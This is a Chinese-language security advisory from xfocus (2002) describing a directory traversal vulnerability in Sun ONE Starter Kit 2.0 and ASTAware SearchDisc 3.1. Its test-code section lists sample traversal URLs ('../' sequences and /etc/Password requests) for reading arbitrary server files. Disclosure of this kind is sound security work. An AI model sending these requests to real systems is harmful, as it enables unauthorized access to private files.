xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
English Version

Sun ONE Starter Kit / ASTAware SearchDisc Search Engine存在目录遍历漏洞


发布时间:2002-10-08
更新时间:2002-10-08
严重程度:
威胁程度:远程非授权文件存取
错误类型:输入验证错误
利用方式:服务器模式

BUGTRAQ ID:5828

受影响系统
ASTAware SearchDisc 3.1
   + Sun ONE Starter Kit 2.0
Sun ONE Starter Kit 2.0
详细描述
Sun ONE Starter Kit 2.0和ASTAware SearchDisc存在目录遍历漏洞。

Starter Kit包含搜索引擎功能可使用户方便的查找信息,搜索引擎对用户提交的请求缺少检查,提交多个'../'可导致以WEB服务进程权利查看系统任意文件内容。

测试代码
http://target:6015/../../../../../
http://target:6016/../../../../../
http://SearchDisk:6017/etc/Password
http://SearchDisk:6017/etc/Root

解决方案


相关信息
ET LoWNOISE <et@cyberspace.org>.
参考:http://online.securityfocus.com/archive/1/293545
相关主页:http://www.astaware.com/
http://wwws.sun.com/software/sunone/starterkit/